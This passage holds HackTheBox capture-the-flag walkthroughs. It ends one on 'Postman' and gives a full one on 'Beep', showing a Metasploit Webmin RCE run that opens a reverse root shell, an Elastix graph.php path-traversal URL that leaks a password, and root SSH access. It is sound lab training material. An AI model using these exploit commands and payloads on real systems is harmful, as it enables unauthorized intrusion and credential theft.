Webmin 1.580 - '/file/show.cgi' Remote Command Execution ( Metasploit) | exploits/unix/remote/21851.rb
Webmin 1.850 - Multiple Vulnerabilities | exploits/cgi/webapps/42989.txt
Webmin 1.900 - Remote Command Execution ( Metasploit) | exploits/cgi/remote/46201.rb
Webmin 1.910 - 'Package Updates' Remote Command Execution ( Metasploit) | exploits/linux/remote/46984.rb
Webmin 1.920 - Remote Code Execution | exploits/linux/webapps/47293.sh
Webmin 1.920 - Unauthenticated Remote Code Execution ( Metasploit) | exploits/linux/remote/47230.rb
Webmin 1.x - HTML Email Command Execution | exploits/cgi/webapps/24574.txt
Webmin < 1.290 / Usermin < 1.220 - Arbitrary File Disclosure ( PHP) | exploits/multiple/remote/1997.php
Webmin < 1.290 / Usermin < 1.220 - Arbitrary File Disclosure ( Perl) | exploits/multiple/remote/2017.pl
phpMyWebmin 1.0 - 'target' Remote File Inclusion | exploits/php/webapps/2462.txt
phpMyWebmin 1.0 - 'window.php' Remote File Inclusion | exploits/php/webapps/2451.txt
webmin 0.91 - Directory Traversal | exploits/cgi/remote/21183.txt
-------------------------------------------------------------------------- ----------------------------------------
Shellcodes: No Result
For the Webmin 1.9.10, we have one vulnerability “Webmin 1.910 - ‘Package Updates’ Remote Command Execution ”.
By using the previous username and password, we can get a root shell.
Also, with the common python method, we can achieve an interactive full shell.
msf5 > use exploit/linux/http/webmin_packageup_rce
msf5 exploit( linux/http/webmin_packageup_rce) > set username Matt
username => Matt
msf5 exploit( linux/http/webmin_packageup_rce) > set password computer2008
password => computer2008
msf5 exploit( linux/http/webmin_packageup_rce) > set rhosts 10.10.10.160
rhosts => 10.10.10.160
msf5 exploit( linux/http/webmin_packageup_rce) > set lhost 10.10.14.9
lhost => 10.10.14.9
msf5 exploit( linux/http/webmin_packageup_rce) > set ssl true
ssl => true
msf5 exploit( linux/http/webmin_packageup_rce) > run
[ * ] Started reverse TCP handler on 10.10.14.9:4444
[ +] Session cookie: 28319cb492d25d1493cbd8a83f732ca8
[ * ] Attempting to execute the payload...
[ * ] Command shell session 1 opened ( 10.10.14.9:4444 -> 10.10.10.160:49658) at 2020-03-16 18:56:54 +0200
id
uid = 0( root) gid = 0( root) groups = 0( root)
python -c "import pty;pty.spawn('/bin/bash')"
root@Postman:/usr/share/webmin/package-updates/#
As always, root.txt is in the directory “/root”.
root@Postman:~# pwd
pwd
/root
root@Postman:~# cat root.txt
cat root.txt
a257741c5bed8be7778c6ed95686ddce
root@Postman:~#
03 Mar 2020
Explanation
Hackthebox is a website which has a bunch of vulnerable machines in its own VPN.
This is a walkthrough of a box “Beep”.
Solution
1. Initial Enumeration
TCP Port Scanning:
root@kali:~# nmap -p- 10.10.10.7 -sV -sC
Starting Nmap 7.80 ( https://nmap.org ) at 2020-03-01 09:55 EET
Nmap scan report for 10.10.10.7
Host is up ( 0.044s latency) .
Not shown: 65519 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 4.3 ( protocol 2.0)
| ssh-hostkey:
| 1024 ad:ee:5a:bb:69:37:fb:27:af:b8:30:72:a0:f9:6f:53 ( DSA)
|_ 2048 bc:c6:73:59:13:a1:8a:4b:55:07:50:f6:65:1d:6d:0d ( RSA)
25/tcp open smtp Postfix smtpd
|_smtp-commands: beep.localdomain, PIPELINING, SIZE 10240000, VRFY, ETRN, ENHANCEDSTATUSCODES, 8BITMIME, DSN,
80/tcp open http Apache httpd 2.2.3
|_http-server-header: Apache/2.2.3 ( CentOS)
|_http-title: Did not follow redirect to https://10.10.10.7/
|_https-redirect: ERROR: Script execution failed ( use -d to debug)
110/tcp open pop3 Cyrus pop3d 2.3.7-Invoca-RPM-2.3.7-7.el5_6.4
|_pop3-capabilities: AUTH-RESP-CODE UIDL STLS EXPIRE( NEVER) APOP TOP IMPLEMENTATION( Cyrus POP3 server v2) PIPELINING RESP-CODES USER LOGIN-DELAY( 0)
111/tcp open rpcbind 2 ( RPC #100000)
143/tcp open imap Cyrus imapd 2.3.7-Invoca-RPM-2.3.7-7.el5_6.4
|_imap-capabilities: ATOMIC LITERAL+ CATENATE ANNOTATEMORE OK CHILDREN IDLE X-NETSCAPE MULTIAPPEND UIDPLUS ID MAILBOX-REFERRALS IMAP4rev1 NAMESPACE LIST-SUBSCRIBED LISTEXT URLAUTHA0001 CONDSTORE UNSELECT Completed SORT = MODSEQ THREAD = ORDEREDSUBJECT THREAD = REFERENCES BINARY SORT RIGHTS = kxte NO STARTTLS RENAME QUOTA IMAP4 ACL
443/tcp open ssl/https?
|_ssl-date: 2020-03-01T09:01:11+00:00; +1h02m01s from scanner time.
880/tcp open status 1 ( RPC #100024)
993/tcp open ssl/imap Cyrus imapd
|_imap-capabilities: CAPABILITY
995/tcp open pop3 Cyrus pop3d
3306/tcp open mysql MySQL ( unauthorized)
4190/tcp open sieve Cyrus timsieved 2.3.7-Invoca-RPM-2.3.7-7.el5_6.4 ( included w/cyrus imap)
4445/tcp open upnotifyp?
4559/tcp open hylafax HylaFAX 4.3.10
5038/tcp open asterisk Asterisk Call Manager 1.1
10000/tcp open http MiniServ 1.570 ( Webmin httpd)
|_http-title: Site doesn't have a title (text/html; Charset=iso-8859-1).
Service Info: Hosts: beep.localdomain, 127.0.0.1, example.com, localhost; OS: Unix
Host script results:
|_clock-skew: 1h02m00s
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 382.63 seconds
root@kali:~#
Gobuster HTTP:
root@kali:~# gobuster dir -u http://10.10.10.7/ -x php -w /usr/share/seclists/Discovery/Web-Content/common.txt
===============================================================
Gobuster v3.0.1
by OJ Reeves ( @TheColonial) & Christian Mehlmauer ( @_FireFart_)
===============================================================
[ +] Url: http://10.10.10.7/
[ +] Threads: 10
[ +] Wordlist: /usr/share/seclists/Discovery/Web-Content/common.txt
[ +] Status codes: 200,204,301,302,307,401,403
[ +] User Agent: gobuster/3.0.1
[ +] Extensions: php
[ +] Timeout: 10s
===============================================================
2020/03/01 10:04:30 Starting gobuster
===============================================================
Error: the server returns a status code that matches the provided options for non existing urls. http://10.10.10.7/23b3f8d9-6290-4f1e-85a5-9a8041a56e20 => 302. To force processing of Wildcard responses, specify the '--wildcard' switch
root@kali:~#
Gobuster HTTPS:
root@kali:~# gobuster dir -u https://10.10.10.7/ -k -x php -w /usr/share/seclists/Discovery/Web-Content/common.txt
===============================================================
Gobuster v3.0.1
by OJ Reeves ( @TheColonial) & Christian Mehlmauer ( @_FireFart_)
===============================================================
[ +] Url: https://10.10.10.7/
[ +] Threads: 10
[ +] Wordlist: /usr/share/seclists/Discovery/Web-Content/common.txt
[ +] Status codes: 200,204,301,302,307,401,403
[ +] User Agent: gobuster/3.0.1
[ +] Extensions: php
[ +] Timeout: 10s
===============================================================
2020/03/01 10:12:31 Starting gobuster
===============================================================
/.hta ( Status: 403)
/.hta.php ( Status: 403)
/.htpasswd ( Status: 403)
/.htpasswd.php ( Status: 403)
/.htaccess ( Status: 403)
/.htaccess.php ( Status: 403)
/admin ( Status: 301)
/cgi-bin/ ( Status: 403)
/config.php ( Status: 200)
/configs ( Status: 301)
/favicon.ico ( Status: 200)
/help ( Status: 301)
/images ( Status: 301)
/index.php ( Status: 200)
/index.php ( Status: 200)
/lang ( Status: 301)
/libs ( Status: 301)
/mail ( Status: 301)
/modules ( Status: 301)
/panel ( Status: 301)
/register.php ( Status: 200)
/robots.txt ( Status: 200)
/static ( Status: 301)
/themes ( Status: 301)
/var ( Status: 301)
===============================================================
2020/03/01 10:15:22 Finished
===============================================================
root@kali:~#
2. Getting Root
On port 443, we can find a login console of Elastix.
We can find a vulnerability for the Elastix by searchsploit.
root@kali:~# searchsploit elastix
----------------------------------------------------------- ----------------------------------------
Exploit Title | Path
| ( /usr/share/exploitdb/)
----------------------------------------------------------- ----------------------------------------
Elastix - 'page' Cross-Site Scripting | exploits/php/webapps/38078.py
Elastix - Multiple Cross-Site Scripting Vulnerabilities | exploits/php/webapps/38544.txt
Elastix 2.0.2 - Multiple Cross-Site Scripting Vulnerabilit | exploits/php/webapps/34942.txt
Elastix 2.2.0 - 'graph.php' Local File Inclusion | exploits/php/webapps/37637.pl
Elastix 2.x - Blind SQL Injection | exploits/php/webapps/36305.txt
Elastix < 2.5 - PHP Code Injection | exploits/php/webapps/38091.php
FreePBX 2.10.0 / Elastix 2.2.0 - Remote Code Execution | exploits/php/webapps/18650.py
----------------------------------------------------------- ----------------------------------------
Shellcodes: No Result
This time, we can take advantage of the vulnerability “Elastix 2.2.0 - ‘graph.php’ Local File Inclusion ”.
According to this page, by accessing the following HTTP request, we can exploit the LFI of Elastix.
https://10.10.10.7/vtigercrm/graph.php?current_language= ../../../../../../../..//etc/amportal.conf%00&module= Accounts&action
If we grep the word “password”, we can find an interesting parameter.
Now we got the following password.
jEhdIekWmdjE
This time, we can use this password for connecting to SSH.
As always, we have “root.txt” in the directory “/root”.
root@kali:~# ssh root@10.10.10.7
root@10.10.10.7's password:
Last login: Sun Mar 1 19:45:39 2020 from 10.10.14.27
Welcome to Elastix
----------------------------------------------------
To access your Elastix System, using a separate workstation (PC/MAC/Linux)
Open the Internet Browser using the following URL:
http://10.10.10.7
[root@beep ~]# cat /root/root.txt
d88e006123842106982acce0aaf453f0
[root@beep ~]#